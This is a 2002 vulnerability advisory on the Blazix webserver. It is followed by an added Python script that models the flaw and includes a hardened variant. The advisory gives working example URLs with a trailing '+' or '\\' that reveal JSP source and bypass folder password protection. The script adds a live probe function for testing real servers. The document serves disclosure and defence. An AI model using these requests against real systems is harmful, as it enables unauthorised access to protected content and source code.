######################################################################

                           Luigi Auriemma

Application:  Blazix (http://www.blazix.com)
Version:      1.2 and previous
Bug:          Bad handling of file names that end with certain "bad"
              characters, with the ability to access any password
              protected folder
Date:         24 Aug 2002
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

######################################################################

===============
1) Introduction
===============

Blazix is a commercial webserver written entirely in Java. It has some
features like the EJB server (port 2050) and the admin server (port
3010), used to change some parameters and to stop or restart the
webserver.
Some functions of this server are: Servlets 2.3 support, ION, JMS,
e-mail sending support, cluster management, class reloads, automatic
EJB primary key generation, virtual hosting support and others.

######################################################################

======
2) Bug
======

The bug I want to describe is one of the most widespread problems in
current applications: some operating system APIs open files without
checking certain characters that can be appended to the file name, so
the name the server checks is not the name that actually gets opened.
In Blazix the "bad" characters are '+' and '\' (the literal characters,
NOT their URL-encoded forms %2b and %5c).
With this bug we can view the source of all the server-side scripts
(JSP) on the server and, more dangerous, we have free access to the
password protected folders.
Attention: version 1.2.1 (released a few days ago) is still vulnerable
to the "password protected folder access" (only the JSP source view
has been fixed in that release).
######################################################################

===========
3) The Code
===========

A] JSP source view examples:

   http://SERVER/jsptest.jsp+
   http://SERVER/jsptest.jsp\

B] Free protected folder access examples (bugtest is a folder that I
   have created and protected with a password):

   http://SERVER/bugtest+/
   http://SERVER/bugtest\/

If you don't have a protected folder you can quickly follow these
simple steps:

a) make a new folder called bugtest in webfiles
b) copy webfiles\index.html to webfiles\bugtest\index.html
c) add "role.user.url: /bugtest/*" to the web.ini file
d) close and restart the web server to load the new settings

A request for http://SERVER/bugtest/ should now ask for a password,
while the two URLs in B] return the page without any authentication.

######################################################################

======
4) Fix
======

The Blazix team has patched the server. You can see your real version
in the Readme.txt file in the Blazix folder (it is the ONLY place where
the real version is written).
Blazix 1.2.2 can be downloaded from its homepage:

   http://www.blazix.com

######################################################################
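The following Python script is an added example and is not part of the original advisory nor Blazix code. It models the mismatch behind the test URLs in section 3: the "role.user.url: /bugtest/*" rule is matched against the request path as received, while the file is opened under a name with the trailing '+' or '\' removed. The stripping behaviour in resolve_on_disk() is an assumption reconstructed from the reported effect, not the real OS or Blazix code; PROTECTED_PATTERNS, the dispatch functions and probe() are hypothetical names. probe() is a live helper for checking a real server and is not exercised offline.

```python
"""Model of the Blazix '+' / '\\' path bug (added example, not Blazix
code): authorization is decided on the raw request path, but the file
is opened under a name with the trailing "bad" character removed."""
import http.client

# Constructed stand-in for the web.ini line "role.user.url: /bugtest/*".
PROTECTED_PATTERNS = ["/bugtest/*"]
# The two trailing characters the advisory names (literal, not %2b / %5c).
BAD_TRAILING = "+\\"


def url_requires_auth(url_path, patterns=PROTECTED_PATTERNS):
    """Servlet-style prefix match, run on the request path as received."""
    for pat in patterns:
        if pat.endswith("/*"):
            prefix = pat[:-1]                      # "/bugtest/"
            if url_path.startswith(prefix) or url_path == prefix[:-1]:
                return True
        elif url_path == pat:
            return True
    return False


def resolve_on_disk(url_path):
    """Model of the open() behaviour the advisory describes: each path
    segment loses a trailing '+' or '\\', so 'bugtest+' opens the folder
    'bugtest' and 'jsptest.jsp+' opens the file 'jsptest.jsp'.
    (Assumption reconstructed from the reported effect, not real code.)"""
    return "/".join(seg.rstrip(BAD_TRAILING) for seg in url_path.split("/"))


def vulnerable_dispatch(url_path, logged_in=False):
    """Returns (status, path_opened, handler). Authorizes and routes on
    the raw path, then opens the stripped one: this is the bug."""
    if url_requires_auth(url_path) and not logged_in:
        return ("401", None, None)
    # "/jsptest.jsp+" does not end in ".jsp", so the JSP engine is skipped
    # and the file is served as static text: source disclosure.
    handler = "jsp" if url_path.endswith(".jsp") else "static"
    return ("200", resolve_on_disk(url_path), handler)


def hardened_dispatch(url_path, logged_in=False):
    """Canonicalize first, refuse any request whose on-disk name differs
    from what was asked for, then authorize and route on that name."""
    canonical = resolve_on_disk(url_path)
    if canonical != url_path:
        return ("400", None, None)
    if url_requires_auth(canonical) and not logged_in:
        return ("401", None, None)
    handler = "jsp" if canonical.endswith(".jsp") else "static"
    return ("200", canonical, handler)


def probe(host, path, port=80, timeout=10):
    """Live check against a real server (not run offline): returns
    (status, body_length) for one raw request path such as '/jsptest.jsp+'.
    The path is sent verbatim, so the literal '+' / '\\' reach the server."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


if __name__ == "__main__":
    for p in ["/bugtest/", "/bugtest+/", "/bugtest\\/",
              "/jsptest.jsp", "/jsptest.jsp+"]:
        print(f"{p:16} vulnerable={vulnerable_dispatch(p)} "
              f"hardened={hardened_dispatch(p)}")
```

Running the script shows "/bugtest/" answered with 401 while "/bugtest+/" and "/bugtest\/" open the same folder with 200, and "/jsptest.jsp+" served as static text rather than through the JSP handler. The hardened variant rejects every request whose canonical name differs from the request, which is the property a fix must guarantee: the name you authorize is the name you open. For a live check, compare probe(host, "/jsptest.jsp") with probe(host, "/jsptest.jsp+"): on a vulnerable server the second returns the raw JSP, so status and body length differ from the rendered page.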